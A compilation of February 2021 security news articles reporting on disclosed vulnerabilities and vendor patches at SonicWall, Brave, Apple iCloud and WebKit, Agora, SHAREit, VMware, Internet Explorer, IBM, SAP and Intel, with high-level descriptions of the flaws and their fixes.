Big Blue also published an advisory to report five vulnerabilities in the Planning Analytics Workspace, which is a component of Planning Analytics, a collaboration and management planning product.
The most severe issues are CVE-2020-8251 and CVE-2020-25649, that are a denial of service and a buffer overflow issue respectively. Both received a CVSS Base score of 7.5.
The IT giant also addressed five low-impact vulnerabilities in IBM Kenexa LMS On Premise, which is an enterprise learning management system.
SonicWall releases second firmware updates for SMA 100 vulnerability
21.2.2021
Vulnerebility
Securityaffairs
Security provider SonicWall released a new firmware update for an SMA-100
zero-day vulnerability that was exploited in attacks.
SonicWall has released
a second firmware update for the SMA-100 zero-day vulnerability that was
exploited in attacks in the wild.
SonicWall disclosed a security breach on January 22, it blamed sophisticated threat actors for the intrusion.
On January, 29 SonicWall announced it was investigating the presence of a zero-day vulnerability in the Secure Mobile Access (SMA) gateways.
NCC Group first disclosed the attacks on SonicWall devices but did not provide details about the flaw exploited by the threat actors.
The vulnerability, tracked as CVE-2021-20016, has been rated as critical and
received a CVSS score of 9.8.
A vulnerability results in improper SQL command
neutralization in the SonicWall SSLVPN SMA100 product, it could be exploited by
a remote, unauthenticated attacker for credential access on SMA100 build version
10.x.
“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker. This vulnerability impacts SMA100 build version 10.x.” reads the advisory.
Early February, SonicWall released the first firmware updates (version 10.2.0.5-29sv) to address an actively exploited zero-day vulnerability in Secure Mobile Access (SMA) 100 series appliances.
This week, SonicWall released new firmware updates for SMA-100 series appliances and urge customers to install them as soon as possible.
The company declared that the security updates include additional security
enhancements.
“Following up on the Feb. 3 firmware update outlined below,
SonicWall is announcing the availability of new firmware versions for both 10.x
and 9.x code on the SMA 100 series products, comprised of SMA 200, 210, 400, 410
physical appliances and the SMA 500v virtual appliance.” reads the security
advisory.
“SonicWall conducted additional reviews to further strengthen the code for the SMA 100 series product line. The new SMA 10.2 firmware includes:
Code-hardening fixes identified during an internal code audit
Rollup of
customer issue fixes not included in the Feb. 3 patch
General performance
enhancements
Previous SMA 100 series zero-day fixes posted on Feb. 3
The
new 9.0 firmware includes:
Code-hardening fixes identified during an internal code audit“
The updates
are available for the following devices:
Physical Appliances: SMA 200, SMA 210, SMA 400, SMA 410
Virtual Appliances:
SMA 500v (Azure, AWS, ESXi, HyperV)
Privacy Bug in Brave Browser Exposes Dark-Web Browsing History of Its Users
21.2.2021
Vulnerebility
Thehackernews
Brave has fixed a privacy issue in its browser that sent queries for .onion domains to public internet DNS resolvers rather than routing them through Tor nodes, thus exposing users' visits to dark web websites.
The bug was addressed in a hotfix release (V1.20.108) made available yesterday.
Brave ships with a built-in feature called "Private Window with Tor" that integrates the Tor anonymity network into the browser, allowing users to access .onion websites, which are hosted on the darknet, without revealing the IP address information to internet service providers (ISPs), Wi-Fi network providers, and the websites themselves. The feature was added in June 2018.
password auditor
This is achieved by relaying users' requests for an onion
URL through a network of volunteer-run Tor nodes. At the same time, it's worth
noting that the feature uses Tor just as a proxy and does not implement most of
the privacy protections offered by Tor Browser.
But according to a report first disclosed on Ramble, the privacy-defeating bug
in the Tor mode of the browser made it possible to leak all the .onion addresses
visited by a user to public DNS resolvers.
"Your ISP or DNS provider will know that a request made to a specific Tor site was made by your IP," the post read.
DNS requests, by design, are unencrypted, meaning that any request to access .onion sites in Brave can be tracked, thereby defeating the very purpose of the privacy feature.
This issue stems from the browser's CNAME ad-blocking feature that blocks third-party tracking scripts that use CNAME DNS records to impersonate the first-party script when it is not and avoid detection by content blockers. In doing so, a website can cloak third-party scripts using sub-domains of the main domain, which are then redirected automatically to a tracking domain.
Brave, for its part, already had prior knowledge of the issue, for it was reported on the bug bounty platform HackerOne on January 13, following which the security issue was resolved in a Nightly release 15 days ago.
It appears that the patch was originally scheduled to roll out in Brave Browser 1.21.x, but in the wake of public disclosure, the company said it's pushing it to the stable version of the browser released yesterday.
Brave browser users can head to Menu on the top right > About Brave to download and install the latest update.
Privacy bug in the Brave browser exposes Tor addresses to user’s DNS provider
20.2.2021
Vulnerebility
Securityaffairs
A privacy bug in the Brave Browser caused the leak of the Tor onion URL
addresses visited in the Tor mode by the users.
A bug in the Private Window
with Tor implemented in the Brave web browser could reveal the onion sites
visited by the users.
The Tor mode implemented in the Brave web browser allows users to access .onion sites inside Brave private browsing windows.
When users are inside a Private Window with Tor, Brave doesn’t connect directly
to a website, instead, it connects to a chain of three different computers in
the Tor network.
An anonymous researcher initially reported that the Brave’s
Tor mode was sending queries for .onion domains to public internet DNS
resolvers, other experts confirmed his findings.
“If you’re using Brave you probably use it because you expect a certain level of privacy/anonymity. Piping .onion requests through DNS where your ISP or DNS provider can see that you made a request for an .onion site defeats that purpose.” explained the researcher. “Anyhow, it was reported by a partner that Brave was leaking DNS requests for onion sites and I was able to confirm it at the time.”
Every query is saved in logs of the DNS server for the Tor traffic of Brave web browser users.
The Brave development team shortly after the public disclosure of the bug
addressed it in The Brave Nightly version and it will be released to the stable
version with the next Brave browser update.
According to the development team, the privacy bug resides in the internal ad blocker component of the Brave web browser. The component was using DNS queries to determine if a site was attempting to bypass the ad-blocking features, but the problem is that it performed the same checks for .onion addresses.
Stored XSS Vulnerability on iCloud.com Earned Researcher $5,000
19.2.2021
Vulnerebility
Securityweek
A bug bounty hunter claims he has earned a $5,000 reward from Apple for reporting a stored cross-site scripting (XSS) vulnerability on iCloud.com.
Vishal Bharad, a researcher and penetration tester from India, published a blog post earlier this week describing his findings. Bharad said he had attempted to find cross-site request forgery (CSRF), insecure direct object reference (IDOR), logic bugs and other types of issues on Apple’s icloud.com website, but ultimately ended up discovering a stored XSS flaw.
The vulnerability was present in the iCloud-hosted versions of Apple’s Pages and Keynote software. Exploitation involved creating a new document or presentation and entering an XSS payload into its name field.
The attacker would then need to share a link to the malicious document or presentation with the targeted user and convince them to access the “Browse All Versions” feature from the “Settings” menu. Once the victim would click on “Browse All Versions,” the attacker’s malicious payload got executed in their browser.
Bharad said he reported his findings to Apple in August 2020 and in October the tech giant informed him that the security hole had earned him $5,000.
The researcher has published a blog post detailing his findings, as well as a
video showing how an attack worked.
XSS vulnerabilities can have a significant impact, which is why companies such as Google, Facebook and Tesla have paid out tens of thousands of dollars for these types of flaws.
Bug bounty platform HackerOne reported last year that its members had earned more than $4 million for XSS vulnerabilities.
ScamClub malvertising gang abused WebKit zero-day to redirect to online gift
card scams
18.2.2021
Vulnerebility
Securityaffairs
Malvertising gang ScamClub has exploited an unpatched zero-day vulnerability in
WebKit-based browsers in a campaign aimed at realizing online gift card scams.
The Malvertising gang ScamClub has abused an unpatched zero-day vulnerability in
WebKit-based browsers to bypass security measures and redirect users from
legitimate sites to websites hosting online gift card scams.
The malvertising campaign was first spotted in June 2020 and is still ongoing despite the flaw has been addressed with the release of security updates early this month.
“A typical ScamClub payload has a few layers to it, starting with an ad tag that loads a malicious CDN hosted dependency. This of course is usually obfuscated in absurd ways in an attempt to evade url blocklists.” reads the analysis published by the security firm Confiant.
The group has been active since 2018, it mainly targeted iOS users with malicious ads that often redirected users to sites hosting online scams. The landing pages were designed to trick victims into providing their financial information.
In the most recent campaign, ScamClub hackers used a new technique to bypass the iframe HTML sandboxing mechanism. The iframe sandboxing is a defense measure that prevents the malicious code from interacting with the underlying website.
The malvertising gang abused a bug in how the Webkit browser engine handles
JavaScript event listeners to redirect users from legitimate sites to malicious
domains that were hosting gift card scams.
“The `allow-top-navigation-by-user-activation` sandbox attribute, which is often
lauded as one of the most vital tools in an anti-malvertising strategy should in
theory prevent any redirection unless a proper activation takes place.
Activation in this context typically means a tap or a click inside the frame.”
continues the analysis.
“This means our proof of concept shouldn’t work under any circumstances. The clickMe button is outside of the sandboxed frame after all. However, if it does redirect, that means we have a browser security bug on our hands, which turned out to be the case when tested on WebKit based browsers, namely Safari on desktop and iOS.”
The trick abused by the threat actors in these malvertising campaigns only worked with browsers using the open-source WebKit engine, such as Apple’s Safari and Google Chrome for iOS.
The experts reported that over the last 90 days, ScamClub gang has delivered over 50 million malicious impressions, alternating a low baseline of activity with frequent manic bursts. The experts observed peak of 16 million impacted ads being served in a single day.
Below the disclosure timeline:
June 22, 2020 — Confiant Security Team
observes event listeners in ScamClub redirect payload.
June 23, 2020 — Bug
report submitted to Apple Security. Google Chrome team also notified (Chrome on
iOS uses WebKit).
Dec 2, 2020 — Patched
https://trac.webkit.org/changeset/270373/webkit
Feb 1, 2021 — CVE assigned
and published as part of Apple’s security update:
https://support.apple.com/en-us/HT212147
Confiant researchers also released
Indicators of Compromise (IoCs) in STIX format.
Agora SDK Bug Left Several Video Calling Apps Vulnerable to Snooping
18.2.2021
Vulnerebility
Thehackernews
A severe security
vulnerability in a popular video calling software development kit (SDK) could
have allowed an attacker to spy on ongoing private video and audio calls.
That's according to new research published by the McAfee Advanced Threat Research (ATR) team today, which found the aforementioned flaw in Agora.io's SDK used by several social apps such as eHarmony, Plenty of Fish, MeetMe, and Skout; healthcare apps like Talkspace, Practo, and Dr. First's Backline; and in the Android app that's paired with "temi" personal robot.
California-based Agora is a video, voice, and live interactive streaming platform, allowing developers to embed voice and video chat, real-time recording, interactive live streaming, and real-time messaging into their apps. The company's SDKs are estimated to be embedded into mobile, web, and desktop applications across more than 1.7 billion devices globally.
password auditor
McAfee disclosed the flaw (CVE-2020-25605) to Agora.io on
April 20, 2020, following which the company released a new SDK on December 17,
2020, to remediate the threat posed by the vulnerability.
The security weakness, which is the consequence of incomplete encryption, could have been leveraged by bad actors to launch man-in-the-middle attacks and intercept communications between two parties.
"Agora's SDK implementation did not allow applications to securely configure the
setup of video/audio encryption, thereby leaving a potential for hackers to
snoop on them," the researchers said.
Specifically, the function responsible for connecting an end-user to a call passed parameters such as App ID and authentication token parameter in plaintext, thereby allowing an attacker to abuse this shortcoming to sniff network traffic so as to gather call information and subsequently launch their own Agora video application to dial into calls without the attendees' knowledge stealthily.
Although there's no evidence that the vulnerability was exploited in the wild, the development once again underscores the need for securing applications to safeguard user privacy.
"In the world of online dating, a breach of security or the ability to spy on calls could lead to blackmail or harassment by an attacker," the researchers concluded. "Other Agora developer applications with smaller customer bases, such as the temi robot, are used in numerous industries such as hospitals, where the ability to spy on conversations could lead to the leak of sensitive medical information."
It's highly recommended that developers using Agora SDK upgrade to the latest version to mitigate the risk.
Popular SHAREit app is affected by severe flaws yet to be fixed
17.2.2021
Vulnerebility
Securityaffairs
Multiple vulnerabilities in the popular file-sharing app SHAREit have yet, to be
addressed, experts from Trend Micro warned.
SHAREit is a popular file-sharing
Android app with more than one billion downloads, experts from Trend Micro
discovered multiple unpatched vulnerabilities in its code.
The vulnerabilities impact the Android version of SHAREit, a mobile app that allows users to share files with friends or between personal devices.
The vulnerabilities can potentially lead to Remote Code Execution (RCE) on the
devices where the app is installed.
The vulnerabilities can be abused to leak
a user’s sensitive data and execute arbitrary code with SHAREit permissions by
using a malicious code or app. They can also potentially lead to Remote Code
Execution (RCE).
“We discovered several vulnerabilities in the application named SHAREit. The vulnerabilities can be abused to leak a user’s sensitive data and execute arbitrary code with SHAREit permissions by using a malicious code or app.” reads the report published by Trend Micro. “They can also potentially lead to Remote Code Execution (RCE).”
The analysis of the app’s code revealed that that potentially any app can can
call the startActivity() function through the broadcast receiver as
“com.lenovo.anyshare.app.DefaultReceiver.” An attacker can view arbitrary
activities, including SHAREit’s internal (non-public) and external app
activities.
Experts also discovered that any third-party entity can still gain temporary read/write access to the FileProvider content provider’s data.
“SHAREit also defines a FileProvider. The developer behind this disabled the exported attribute via android:exported=”false”, but enabled the android:grantUriPermissions=”true” attribute. This indicates that any third-party entity can still gain temporary read/write access to the content provider’s data.” continues the analysis.
“Even worse, the developer specified a wide storage area root path. In this
case, all files in the /data/data/<package> folder can be freely accessed.”
The app also provides a feature that can install an APK with the file name
suffix sapk, an attacker can potentially abuse this feature to install a
malicious app.
“If such is the case, it will enable a limited RCE when the user clicks on a URL.” continues the analysis. “To verify whether the above functionality is available in the Google Chrome browser, we built an href attribute in HTML. When the user clicks this download URL, Chrome will call SHAREit to download the sapk from http://gshare.cdn.shareitgames.com. Since it supports the HTTP protocol, this sapk can be replaced by simulating a man-in-the-middle (MitM) attack.”
Trend Micro has reported the vulnerabilities to the company behind the app but did not receive any reply and after three months decided to dislose it.
WebKit Zero-Day Vulnerability Exploited in Malvertising Operation
17.2.2021
Vulnerebility
Securityweek
A malvertising operation observed last year by advertising cybersecurity company Confiant exploited what turned out to be a zero-day vulnerability in the WebKit browser engine.
Confiant researchers discovered the security hole while analyzing a campaign carried out by a threat actor they call ScamClub. The group has been around for several years, launching malvertising attacks designed to redirect users to a wide range of scam websites promising prizes.
ScamClub specializes in high-volume operations — even if most of their payloads are blocked, a large number still reach users.
“Over the last 90 days, ScamClub has delivered over 50MM malicious [ad] impressions, maintaining a low baseline of activity augmented by frequent manic bursts — with as many as 16MM impacted ads being served in a single day,” Confiant said in a blog post on Tuesday.
The “allow-top-navigation-by-user-activation” attribute in WebKit’s iframe sandboxing feature is designed to prevent malicious redirections by only allowing a redirection to occur when it’s triggered by user actions (e.g. a click or a tap inside the frame).
However, Confiant discovered that the ScamClub threat actor managed to bypass this iframe sandboxing mechanism by using an event listener for a “message” event. If the event listener picks up a message, it would trigger the redirect, which increases the chances of users being redirected to their scam websites without actually clicking inside their iframe to directly trigger the redirect.
“In modern web applications, messages are flying around all the time, usually with wildcard destinations, often on user interaction,” Confiant explained.
“Combined with ScamClub’s large volumes and broad targeting that hits dozens of different websites, it’s all about the increased efficacy of spawning a successful redirect — even if we’re talking about a single digit percentage increase, that can mean tens of thousands of impacted impressions over the duration of a single campaign,” the company added.
Confiant spotted the campaign exploiting the vulnerability in June 2020 and immediately reported its findings to Apple, whose Safari browser uses WebKit, and Google, whose Chrome browser on iOS also uses WebKit.
The issue was addressed in WebKit in December 2020, and Apple included the patch in the versions of WebKit delivered with updates released for iOS and macOS earlier this month. Apple tracks the issue as CVE-2021-1801 and claims to have addressed it with “improved iframe sandbox enforcement.”
Several Vulnerabilities Found in Popular File Sharing App SHAREit
17.2.2021
Vulnerebility
Securityweek
Researchers have discovered several vulnerabilities in the SHAREit Android application, including flaws that could expose sensitive user data and allow remote code execution.
SHAREit, originally made by Chinese tech giant Lenovo, is a popular cross-platform file sharing app currently developed by Smart Media4U Technology. The company was initially based in Beijing, China, but recently moved its commercial headquarters to Singapore. Wikipedia now describes it as a global technology company in Singapore.
SHAREit is one of the tens of Chinese mobile apps banned last year by India due to national security and privacy concerns.
Cybersecurity firm Trend Micro reported on Monday that its researchers discovered some potentially serious vulnerabilities in the SHAREit app for Android, which has been installed from Google Play more than one billion times.
Trend Micro disclosed its findings in a blog post containing technical information about each issue, as well as proof-of-concept (PoC) exploit code.
According to the company, the vulnerabilities found in SHAREit can be exploited by malicious applications installed on the targeted user’s device to overwrite files associated with SHAREit and execute arbitrary code, download and install other malicious applications on the smartphone, and obtain sensitive user data from the device. An attack is not easy to detect, users have been warned.
Trend Micro said it reported its findings to both Google and SHAREit developers. The cybersecurity firm decided to disclose its findings after the vendor failed to respond after being notified more than three months ago.
SHAREit for Android was last updated on February 9, but it’s unclear if any of the flaws have been patched. SecurityWeek has reached out to Smart Media4U for comment.
SHAREit developers do not appear to have a good track record when it comes to addressing vulnerability reports. Information security consultancy firm RedForce in 2019 disclosed a couple of vulnerabilities found by its employees in the SHAREit app for Android. The flaws were patched after roughly 10 weeks, but RedForce said “communication with SHAREit team was not a good experience at all; Not only they took too long to respond to our messages, they also were not cooperative in any means and we did not feel that our work or efforts were appreciated at all.”
VMware fixes command injection issue in vSphere Replication
16.2.2021
Vulnerebility
Securityaffairs
VMware released security patches for a potentially serious vulnerability
affecting the vSphere Replication product.
VMware has recently released
security patches to address a serious command injection vulnerability, tracked
as CVE-2021-21976, in its vSphere Replication product.
VMware vSphere Replication is an extension to VMware vCenter Server that
provides hypervisor-based virtual machine replication and recovery. vSphere
Replication is an alternative to storage-based replication.
The
vulnerability can be exploited by an attacker with admin privileges to execute
shell commands on the underlying system.
“vSphere Replication contains a post-authentication command injection vulnerability in “Startup Configuration” page.” reads the advisory published by the virtualization giant. “A malicious actor with administrative access in vSphere Replication can execute shell commands on the underlying system. Successful exploitation of this issue may allow authenticated admin user to perform a remote code execution.”
The CVE-2021-21976 flaw has been rated as ‘Important’ and received a CVSSv3 base score of 7.2.
The vulnerability was discovered by the researcher Egor Dimitrenko from Positive Technologies.
Vendor Ships Unofficial Patch for IE Zero-Day Vulnerability
16.2.2021
Vulnerebility
Securityweek
Slovenia-based cybersecurity research company ACROS Security last week announced the release of an unofficial micro-patch for a zero-day vulnerability in Microsoft Internet Explorer (IE) that North Korean hackers are believed to have exploited in a campaign targeting security researchers.
South Korean security vendor ENKI published a report on the IE zero-day in early February, claiming that North Korean hackers leveraged it to target its researchers with malicious MHTML files leading to drive-by downloads of malicious payloads.
Microsoft has confirmed receiving a report on the vulnerability through an “incorrect channel,” and said that it was committed to investigate the report and deliver a patch as soon as possible.
However, a fix for this zero-day was not included in the security updates that Microsoft released last week as part of its February 2021 Patch Tuesday.
On Thursday, ACROS Security announced that an unofficial patch for the vulnerability is now available through its 0patch service.
“We have just issued the first batch of micropatches for the Internet Explorer HTML Attribute nodeValue Double Free 0day, which affects all Windows workstations and servers from (at least) Windows 7 and Server 2008 R2 to the very latest supported versions, even if fully updated,” the company announced.
The company said that for the release of this patch it worked together with ENKI, which shared their proof-of-concept to help with the development of a fix.
“The vulnerability is a double free, triggered by making Internet Explorer clear an HTML Attribute value twice,” ACROS Security revealed.
The exploit that ENKI discovered leads to the execution of arbitrary code inside Internet Explorer when the user visits a malicious website, and does not require additional user interaction.
IE’s usage is low, but the browser is still present on Windows computers and is set as the default application for opening MHT/MHTML files. Furthermore, the browser is used internally within a large number of organizations and can execute HTML content inside Windows applications, ACROS notes.
To address the bug, the unofficial patch no longer allows for “an HTML Attribute value (normally a string) to be an object.” With only 5 or 6 CPU instructions, the patch should fully prevent exploitation, ACROS Security says.
The first batch of patches is being delivered to Windows (32bit and 64bit) systems that run the January 2021 Patch Tuesday updates (Windows 7 + ESU, Windows 10, Server 2008 R2 + ESU, Server 2016, 2019) and to those last updated on January 2020 (namely Windows 7 and Server 2008 R2 without ESU).
A second batch of patches is set to arrive on systems that have the February 2021 set of official security updates installed.
Vulnerability in VMware vSphere Replication Can Facilitate Attacks on
Enterprises
16.2.2021
Vulnerebility
Securityweek
VMware last week informed customers about the availability of patches for a potentially serious vulnerability affecting its vSphere Replication product.
vSphere Replication, a VMware vSphere component, is a virtual machine replication engine designed for data protection and disaster recovery.
VMware has told customers that several versions of the product are affected by a high-severity (important) command injection vulnerability that can be exploited by a hacker with admin privileges to execute shell commands on the underlying system.
“Successful exploitation of this issue may allow authenticated admin user to perform a remote code execution,” VMware said in its advisory.
The security hole is tracked as CVE-2021-21976. Patches have been released for each of the affected versions of vSphere Replication.
Egor Dimitrenko, the Positive Technologies researcher who discovered the vulnerability, told SecurityWeek that an attacker could obtain the access required for exploitation through, for example, social engineering or by hoping that the targeted admin account is protected by a weak password. Once the account has been accessed, exploitation of the vulnerability is not difficult, the researcher said.
“When carrying out an attack on a company infrastructure, an attacker can detect the VMware vSphere Replication instance at the perimeter of its network and, as the used password is weak, for example, he can guess credentials to enter the administrator interface,” Dimitrenko explained. “After gaining authorized access, the attacker will be able to exploit this vulnerability and execute arbitrary commands on the server with maximum privileges.”
“Having obtained the possibility of the execution of arbitrary commands on the server with maximum privileges, the attacker will be able to start further progress to seize full control over the company's infrastructure,” he added.
TIM’s Red Team Research (RTR) discovered a critical zero-day vulnerability in
IBM InfoSphere Information Server
13.2.2021
Vulnerebility
Securityaffairs
Researchers at TIM’s Red Team Research discovered a zero-day vulnerability in
IBM InfoSphere Information Server.
Today, TIM’s Red Team Research led by
Massimiliano Brolli, discovered a new critical vulnerability in IBM InfoSphere
Information Server. The flaw has not addressed by IBM, because the product
version 8.5.0.0 is in End-of-life.
Today, TIM’s Red Team Research led by Massimiliano Brolli, discovered a new critical vulnerability in IBM InfoSphere Information Server. The flaw has not addressed by IBM, because the product version 8.5.0.0 is in End-of-life.
IBM InfoSphere Information Server is a data management product.
According to the product description from the vendor page:
“IBM InfoSphere Information Server Enterprise Edition is an industry-leading, end-to-end data platform that provides a complete suite of capabilities. These capabilities include automated data discovery, policy-driven governance, self-service data preparation, data quality assessment and cleansing for data in flight and at rest, and advanced dynamic or batch data transformation and movement. It helps you deliver trusted business-ready data to your key business initiatives such as big data, data lakes, data warehouse modernization and master data management.”
Cybersecurity researchers identified a Deserialization of Untrusted Data (CWE-502), identified as CVE-2020-27583, has a CVSS3 score of 9.8. The vulnerability allows unrestricted remote code execution with root privileges, without requiring any authentication.
The laboratory has identified, from public sources available on the corporate website, vulnerabilities on vendors such as Oracle, Nokia, Siemens, Schneider Electric, QNAP, Selesta, WOWZA, MultiUX and recently WordPress, helping to improve overall IT security.
The complete list of CVEs discovered by TIM researchers (formerly Telecom Italia S.p.A.) are available on the TIM Corporate websites:
https://www.gruppotim.it/redteam
TIM is one of the main Italian
telecommunications companies, it is one of the few Italian industrial companies
that has devoted such an important effort to the search for undocumented
vulnerabilities.
SAP Commerce Critical Security Bug Allows RCE
11.2.2021 Vulnerebility Threatpost
The critical SAP cybersecurity flaw could allow for the compromise of an application used by e-commerce businesses.
SAP is warning of a critical vulnerability in its SAP Commerce platform for e-commerce businesses. If exploited, the flaw could allow for remote code execution (RCE) that ultimately could compromise or disrupt the application.
SAP Commerce organizes data – such as product information – to be disseminated across multiple channels. This can give businesses a leg up in dealing with complex supply-chain management issues.
The vulnerability (CVE-2021-21477) affects SAP Commerce versions 1808, 1811, 1905, 2005 and 2011. It ranks 9.9 out of 10 on the CVSS scale – making it critical in severity.
“With regard to the assigned CVSS score of 9.9 and facing the potential impact on the application, it is strongly recommended to mitigate the vulnerability as soon as possible,” said Thomas Fritsch with Onapsis, in a Tuesday analysis.
What Are SAP Commerce Drools Rules?
The flaw allows certain users with
“required privileges” to edit Drools rules. Drools is an engine that makes up
the rules engine for SAP Commerce. The purpose of Drools is to define and
execute a set of rules that can be used by businesses to manage complex
decision-making scenarios.
The flaw specifically stems from a rule in Drools that contains a ruleContent attribute. This attribute provides scripting facilities. Jurisdiction over ruleContent is typically reserved high-privileged users, such as administrators, said Fritsch.
However, “due to a misconfiguration of the default user permissions that are shipped with SAP Commerce, several lower-privileged users and user groups gain permissions to change the DroolsRule ruleContents and thus gain unintended access to these scripting facilities,” said Fritsch.
Remote Code Execution in SAP Commerce
This means that an attacker with that
lower level of privilege can inject malicious code into the Drools rules scripts
– leading to RCE and the compromise of the underlying host. And ultimately, this
allows a cybercriminal to impair “the confidentiality, integrity and
availability of the application,” said Fritsch.
A patch has been issued; however, Fritsch said, the fixes for the vulnerability only address the default permissions when initializing a new installation of SAP Commerce.
“For existing installations of SAP Commerce, additional manual remediation steps are required,” he said. “The good news is that for existing installations, these manual remediation steps can be used as a full workaround for SAP Commerce installations that cannot install the latest patch releases in a timely manner.”
Other Critical SAP Cybersecurity Releases
The vulnerability update was one of
seven security notes released on Tuesday by SAP. The other six releases were
updates to previously released Patch Tuesday security notes.
One of these ranked 10 on the CVSS scale and addressed security issues in the browser control for Google Chromium, which is delivered with the SAP business client. It affects SAP business client version 6.5. A specific CVE assignment for this flaw, and further details, were not available.
Another critical-severity flaw that was previously released and updated on Tuesday included multiple flaws (CVE-2021-21465) in SAP Business Warehouse, a data “warehousing” product based on the SAP NetWeaver ABAP platform, which collects and stores data.
“The BW Database Interface allows an attacker with low privileges to execute any crafted database queries, exposing the backend database,” according to the Mitre Corporation. “An attacker can include their own SQL commands which the database will execute without properly sanitizing the untrusted data leading to SQL injection vulnerability which can fully compromise the affected SAP system.”
Patch Tuesday Security Updates
The vulnerability fixes come during a busy
Patch Tuesday week. Microsoft addressed nine critical-severity security bugs in
its February Patch Tuesday updates, as well as an important-rated vulnerability
that is being actively exploited in the wild.
Adobe warned of a critical vulnerability that has been exploited in the wild in “limited attacks” to target Adobe Acrobat Reader users on Windows.
And, Intel issued fixes for five high-severity vulnerabilities in its graphics drivers. Attackers can exploit these flaws to launch an array of malicious attacks – such as escalating their privileges, stealing sensitive data or launching denial-of-service attacks.
Intel Squashes High-Severity Graphics Driver Flaws
11.2.2021
Vulnerebility
Threatpost
Intel is warning on
security bugs across its graphics drivers, server boards, compute modules and
modems.
Intel has issued fixes for five high-severity vulnerabilities in its graphics drivers. Attackers can exploit these flaws to launch an array of malicious attacks – such as escalating their privileges, stealing sensitive data or launching denial-of-service attacks.
The graphics driver is software that controls how graphic components work with the rest of the computer. Intel develops graphics drivers for Windows OS to communicate with specific Intel graphics devices, for instance. The most serious of the flaws in Intel’s graphics drivers (CVE-2020-0544), which ranks 8.8 out of 10 on the CVSS scale, stems from the kernel mode driver, which is the piece of a graphics driver that executes any instruction it needs on the CPU without waiting, and can reference any memory address that is available.
This flaw stems from insufficient control-flow management in Intel graphics drivers prior to version 15.36.39.5145. The flaw can enable a user to escalate their privileges – however, an attacker would need to be authenticated and have local access to the device, said Intel.
Another privilege-escalation issue (CVE-2020-0521) stemming from insufficient control-flow management was fixed in Intel graphics drivers (also before version 15.45.32.5145). To exploit this flaw, an attacker would also need to be authenticated and have local access.
Intel also warned of a use-after-free bug (CVE-2020-12361), an improper conditions-check problem (CVE-2020-24450) and an integer-overflow vulnerability (CVE-2020-12362) in its graphics drivers. The latter could enable denial-of-service (DoS) attacks on affected devices.
Intel Server Boards and Compute Modules Flaws
Intel also patched two
high-severity flaws in its server boards, server systems and compute modules.
Specifically affected are the Intel Server System R1000WF and R2000WF families;
Intel Server Board S2600WF family, Intel Server Board S2600ST family and Intel
Server Board S2600BP family; and Intel Compute Module HNS2600BP family.
One of these flaws is a buffer-overflow issue (CVE-2020-12373) in the Baseboard Management Controller (BMC) firmware for some Intel server boards, server systems and compute modules. The second vulnerability is an insufficient input validation hole (CVE-2020-12377) in the BMC firmware. Both flaws exist before version 2.47 and could “allow an authenticated user to potentially enable escalation of privilege via local access.”
Other Intel Security Vulnerabilities
Intel also fixed a high-severity flaw in
its XMM 7360 modem, which converts data from a digital format into a format for
a transmission medium. It’s used for LTE 4G smartphones and tablets.
“Improper buffer restrictions in firmware for Intel 7360 Cell Modem before UDE version 9.4.370 may allow unauthenticated users to potentially enable denial-of-service via network access,” said Intel.
The other high-severity flaw exists in Intel’s SSD Toolbox. This toolbox allows Windows users to update the firmware and run diagnostic tests on an Intel solid-state drive (SSD). According to Intel, the vulnerability stems from incorrect default permissions in the installer of the Intel SSD Toolbox, and may enable a privileged user to potentially enable local privilege escalation.
The fixes end a dry spell in security updates for Intel, which hasn’t disclosed any patched vulnerabilities since November. At that time, Intel issued a colossal security update addressing flaws across a myriad of products – most notably, critical bugs that can be exploited by unauthenticated cybercriminals in order to gain escalated privileges.
SAP addresses a critical flaw in SAP Commerce Product
11.2.2021
Vulnerebility
Securityaffairs
SAP released seven new security notes on February 2021 Security Patch Day,
including a Hot News note for a critical issue affecting SAP Commerce.
SAP
released seven new security notes on February 2021 Security Patch Day and
updated six previously released notes.
The new security notes include a Hot News note that addresses a critical vulnerability, tracked as CVE-2021-21477, in SAP Commerce.
The CVE-2021-21477 is a remote code execution that impacts the Commerce product if the rule engine extension is installed. The critical flaw received a CVSS score of 9.9.
“SAP Commerce Cloud, versions – 1808,1811,1905,2005,2011, enables certain users with required privileges to edit drools rules, an authenticated attacker with this privilege will be able to inject malicious code in the drools rules which when executed leads to Remote Code Execution vulnerability enabling the attacker to compromise the underlying host enabling him to impair confidentiality, integrity and availability of the application.” reads the advisory for the flaw.
Experts from security firm Onapsis pointed out that rule engine extension is a common part of SAP Commerce installs, the patch addresses the majority of these installations.
The rule engine is based on the Drools engine and is used to define and execute a set of rules that can manage even extremely complex decision-making scenarios.
“Drools rules contain a ruleContent attribute that provides scripting facilities. Changing of ruleContent should normally be limited to highly privileged users, like admin and other members of admingroup.” reads the analysis published by Onapsis. “Due to a misconfiguration of the default user permissions that are shipped with Commerce, several lower-privileged users and user groups gain permissions to change DroolsRule ruleContents and thus gain unintended access to these scripting facilities. This enables unauthorized users to inject malicious code into these scripts resulting in a strong negative impact on the application’s confidentiality, integrity and availability.”
in order to address this issue, the software giant has changed the default permissions for new SAP Commerce installations, the company also provided manual remediation steps for existing installations.
The following other two Hot News notes released by the vendor are updates to previously released notes:
Update to security note released on April 2018 Patch Day:
Security updates
for the browser control Google Chromium delivered with SAP Business Client
-Product – SAP Business Client, Version – 6.5.
Update to security note
released on January 2021 Patch Day:
[CVE-2021-21465] Multiple vulnerabilities
in SAP Business Warehouse (Database Interface). Additional CVE – CVE-2021-21468
Product – SAP Business Warehouse, Versions – 710, 711, 730, 731, 740, 750, 751,
752, 753, 754, 755, 782
SAP release two high severity security notes, one
for missing authorization checks in NetWeaver AS ABAP and S4 HANA (SAP Landscape
Transformation), and another for a Denial of service (DOS) in SAP NetWeaver AS
ABAP and ABAP Platform.
The remaining security notes address medium-severity vulnerabilities in NetWeaver Master Data Management 7.1, NetWeaver Process Integration, Business Objects Business Intelligence Platform, SAPUI5, Web Dynpro ABAP Applications, UI5 HTTP Handler, and HANA Database.
Critical Vulnerability Patched in SAP Commerce Product
11.2.2021
Vulnerebility
Securityweek
SAP has released seven new security notes on February 2021 Security Patch Day, including a Hot News note that addresses a critical flaw in SAP Commerce. It also updated six previously released notes.
Tracked as CVE-2021-21477 and featuring a CVSS score of 9.9, the critical issue could be abused for remote code execution, SAP explains in its advisory. The vulnerability impacts SAP Commerce if the rule engine extension is installed.
